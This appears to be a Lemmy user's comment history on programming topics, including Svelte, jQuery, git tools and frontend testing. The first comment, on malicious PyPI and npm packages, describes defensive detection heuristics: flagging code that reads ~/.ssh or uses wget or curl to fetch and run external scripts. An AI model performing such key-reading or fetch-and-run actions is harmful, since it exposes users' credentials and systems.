CmdrKeen
@CmdrKeen@lemmy.today
- Comment on SSH keys stolen by stream of malicious PyPI and npm packages 10 months ago:
IDK, virus scanners and malware detectors could do these things before AI.
You could search for stuff like directly accessing the
~.ssh
directory, or any invocations ofwget
orcurl
to download external scripts and run them through an interpreter and flag those for closer inspection.If you want to get fancier, automate installing packages in an isolated environment (like a container or VM) and keep track of every file system access and network request they make.
Sure, eventually they’ll figure out ways to obfuscate those things, too, but it could at least prevent people from doing things in such blatantly obvious ways.
- Comment on Client did not pay? 11 months ago:
“Abandon all hope, ye who enter here.”
- Comment on On developer dogma #3 : Never ship on Fridays 11 months ago:
As someone who has experienced burnout before: that’s exactly what it looks like.
- Comment on GitHub Desktop or Git CLI? 11 months ago:
GitLens?
- Comment on Is jQuery still the go-to JS helper library? 11 months ago:
You mean these? Does it use them internally, because I haven’t really seen them in any Svelte code.
If so, what does it matter what the compiler does in order to make your code work, so long as it’s legal? It’s perfectly valid JS, that’s all that counts.
I wouldn’t say Svelte is weird as much as it’s different. That’s the whole point after all. Instead of adding a bunch of library bloat and keeping an entire copy of the DOM to constantly compare to and derive changes from, it compiles your components down to native JS that manipulates the DOM directly, like you would by hand. Except of course the compiler uses different ways to achieve that than you would, but that’s because it doesn’t have to care about readability, as long as it creates valid and efficient code.
- Comment on Is jQuery still the go-to JS helper library? 11 months ago:
Both are weird compared to Svelte.
- Comment on What operating system and tools should a beginner use to learn programming? 11 months ago:
It really doesn’t matter. Literally a Raspberry Pi will do for a beginner.
- Comment on To A Man With `jq`, Everything Looks Like JSON 11 months ago:
And
jc
, apparently: programming.dev/post/7063427 - Comment on Need a rust version too. 11 months ago:
require 'castle' begin Castle.attack rescue Princess => p puts "Done" end
- Comment on Need a rust version too. 11 months ago:
from Castle import Princess
Done
- Comment on what's the difference? 11 months ago:
Yes, but mostly because the general population likely isn’t super familiar with Bittorrent and PirateBay.
A better, yet similarly correct explanation would be to say GitHub is to Git what GMail is to email.
This also doesn’t confuse protocol and content, and it doesn’t require knowledge of piracy.
- Comment on How do I convince my company to add tests for FE? 11 months ago:
How do you calculate those numbers though?
It’s not like your colleagues will be keeping track of how much time they’ve wasted writing ineffective code. If anything, they’ll try to hide that by arbitrarily inflating sprint points etc.
I’ve worked in environments like that and the issue almost always isn’t that people wouldn’t LIKE it if there were tests, it’s that they
- Don’t want to have to learn something new in order to do the same job they’re already comfortable with
- Are worried that if they convince management to let them invest X amount of time into doing something that will improve productivity, they’ll be expected to be more productive in the future
And of course, all of this for no extra money. Unless you work at a place where management prioritzes developer happiness over how many sprint points the team can knock out every week (and those are rare), the sad truth is that it’ll likely be about as popular as leftover food growing mold in the community fridge.